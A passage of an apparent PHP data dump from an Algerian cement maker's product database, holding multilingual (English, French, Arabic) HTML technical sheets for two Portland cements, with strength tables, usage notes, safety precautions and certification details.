<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:145px">
<pre style="text-align:center">
<span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Limit of Resistance according to the Standard NA 442
</strong></span></span></pre>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Specified Lower Limit<br />
of our Cement</span></span></strong></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:30px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>02 days</strong></span></span></p>
</td>
<td style="height:30px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:30px; width:123px">
<p style="text-align:center"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>21,36</strong></span></span></small></p>
</td>
<td style="height:30px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">27,71</span></span></strong></p>
</td>
</tr>
<tr>
<td style="height:51px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>28 days</strong></span></span></p>
</td>
<td style="height:51px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span></strong></span></span></p>
</td>
<td style="height:51px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span></strong></span></span></p>
</td>
<td style="height:51px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The chemical properties, which are an important factor in the resistance of concrete to aggressive environments, concern the sulfuric anhydride (SO3) content of less than 3.0% (3.5% for classes 42.5 R and 52.5) and in chloride ions less than 0.10%.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><small><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Main fields of employment</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong> is suitable for reinforced concrete or prestressed concrete, on the other hand its mechanical characteristics do not generally justify its use for ordinary masonry work and large mass or weakly reinforced concrete.<br />
<strong>The Cement CEM I / 42.5 N-LH / SR5</strong> allows appreciable rapid stripping, especially in prefabrication.<br />
For work in an aggressive environment, sea water or sulphated water, Portland Cement CEM I 42.5 N-LH / SR5 will be used respectively for work at sea PM, or for work in water with a high content of ES sulphates.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Special precautions</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">For massive structures, avoid the use of the<strong> Cement CEM I 42.5 N-LH / SR5</strong>, the heat of hydration of which may lead to an excessive rise in temperature during their construction.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The </span></span><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-rmn-container">
<p style="text-align:left"> </p>
</div>
<p> </p>
</div>
</div>
',
'img_prd' => 'produit-1716888919.png',
'img_prd_detail' => '',
'Code_Pr' => '89963',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1709106473.pdf',
'pos_slider' => '8'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 2 => array(
'Produit' => array(
'id' => '78999',
'nom_fr' => 'GICA BETON',
'nom_ara' => 'جيكا بيطون',
'nom_en' => 'GICA BETON',
'sous_nom_fr' => 'CEM II A-L 42.5 N',
'sous_nom_ara' => 'CEM II A-L 42.5 N',
'sous_nom_en' => 'CEM II A-L 42.5 N',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p style="text-align: justify;"> <span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Composition</strong></u><strong> : </strong></span></span></span></span></p>
<p style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le<strong> Ciment Portland au Calcaire CEM II/A-L 42,5N -NA 442/2013</strong>- résulte du mélange du clinker en quantité au moins égale à 88-82 % et d’autres constituants tels que le Tuf & la Pouzzolane dont le total ne dépasse pas 7-13 %. </span> <span style="color:rgb(50, 50, 50)"> </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Valeurs Limites</strong></u><strong> :</strong></span></span></span><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"> </span><span style="color:rgb(50, 50, 50)"> </span></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Des valeurs limites de résistances minimales sont fixées aux échéances 2 et 28 jours. Des valeurs limites sont également fixées pour la teneur en SO3 inférieure à 3,5 % et la teneur en ions chlorure inférieure à 0,10 %.</span></span></span></p>
<p style="margin-left:21.3pt"><span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Valeur limite de résistance à la compression pour CEM II/A-L 42,5N -NA 442/2013-</strong></span></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:324px; width:432px">
<thead>
<tr>
<th scope="col" style="height:88px; width:110px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:142px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:120px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:151px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Contrôle de la Qualité</strong></u><strong> :</strong> </span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Principaux domaines d’emploi</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> convient pour les travaux de toute nature en béton armé. Notre ciment est adapté au béton précontraint et au béton armé. De façon générale, le <strong>CEM II/A-L 42,5N</strong> <strong>-NA 442/2013-</strong> est bien adapté pour les travaux massifs exigeant une élévation de température modérée. La classe R sera préférée pour les travaux exigeants des résistances initiales plus élevées. Pour les travaux en milieux agressifs, on emploiera le Ciment pour les travaux à la mer (PM) ou résistant aux eaux sulfatées (ES).</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Précautions particulières</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Lorsque l’aspect esthétique est important (béton brut, enduits), il convient d’éviter l’emploi de certain <strong>CEM II</strong> comportant des proportions importantes de constituants susceptibles d’entraîner des variations de teinte trop marquées, les cendres volantes notamment.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Mesures de Protection</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le <strong>Ciment Portland CEM II A-L 42.5 N</strong> est livré en vrac et en sacs de 50 kg.</span></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"><span dir="ltr" lang="fr">Le <strong>Ciment CEM II/A (P-L) 42,5N</strong> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-</span>.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><u><span style="color:#008000"><strong>التركيبة</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<p style="text-align:right"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الاسمنت البورتلاندي بالحجر الجيري <strong>CEM II/A-L 42,5N </strong> ناتج عن خليط الكلنكر بكمية لا تقل عن 88-82٪ ومكونات أخرى مثل Tuff & Pozzolane ، والتي لا يتجاوز مجموعها 7 -13٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u><strong> :</strong></span></span></span></p>
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-lfl" id="tw-target-text-container">
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تعيين قيم الحد الأدنى من القوة لمدة 2 و 28 يومًا. يتم أيضًا تعيين القيم الحدية لمحتوى SO3 أقل من 3.5٪ ومحتوى أيون الكلوريد أقل من 0.10٪</span></span></p>
</div>
</div>
</div>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:#008000">قيمة حد قوة الانضغاط لـ CEM II / A-L 42.5N </span></strong></span></span></p>
<table border="1" cellpadding="1" cellspacing="1" style="height:186px; width:431px">
<tbody>
<tr>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>حد القوة وفقًا للمعيار NA 442</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأدنى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة </strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif"><small><strong><span style="color:rgb(50, 50, 50)">≥</span></strong></small></span></span> <span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>10,0</strong></span></span></span></p>
</td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>22.08</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25.98</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًان</strong></span></span></span></td>
</tr>
<tr>
<td style="text-align:center"><strong>62.5≤res≥42,5</strong></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>44,18</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>48.49</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًا28</strong></span></span></span></td>
</tr>
</tbody>
</table>
<p style="text-align:right"> </p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u><span style="color:#008000">مجالات الاستعمال الرئيسية:</span></u></strong></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا لجميع أنواع أعمال الخرسانة المسلحة. الأسمنت الخاص بنا مناسب للخرسانة سابقة الإجهاد والخرسانة المسلحة. بشكل عام ، يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا تمامًا للأعمال الضخمة التي تتطلب ارتفاعًا معتدلًا في درجة الحرارة. سيتم تفضيل الفئة R للعمل الذي يتطلب نقاط قوة أولية أعلى. للعمل في بيئات عدوانية ، سيتم استخدام الأسمنت للعمل في البحر (PM) أو مقاومة للمياه الكبريتية (ES).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>إحتياطات خاصة </strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000000">عندما يكون الجانب الجمالي مهمًا (الخرسانة الخام ، اللصقات) ، فمن المستحسن تجنب استخدام <strong>CEM II</strong> الذي يشتمل على نسب كبيرة من المكونات التي قد تسبب اختلافات ملحوظة في اللون ، وخاصة الرماد المتطاير.</span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية :</span></span></strong></u></span></p>
